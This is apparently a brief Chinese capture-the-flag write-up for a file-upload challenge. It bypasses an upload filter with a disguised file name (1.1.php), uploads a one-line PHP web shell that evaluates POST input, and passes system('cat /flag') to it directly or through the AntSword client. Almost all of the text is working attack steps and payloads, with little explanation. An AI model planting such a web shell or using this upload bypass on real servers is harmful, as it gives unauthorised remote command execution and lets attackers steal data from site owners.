开始的时候选择文件上传,上传php发现被拦截,于是想办法绕过,在中间加上一些无关字符就可以绕过,比如1.1.php
上传成功后直接利用一句话木马
<?php eval($_POST['a']); ?>
然后可以用蚁剑或者直接post传参找到flag
a=system('cat /flag');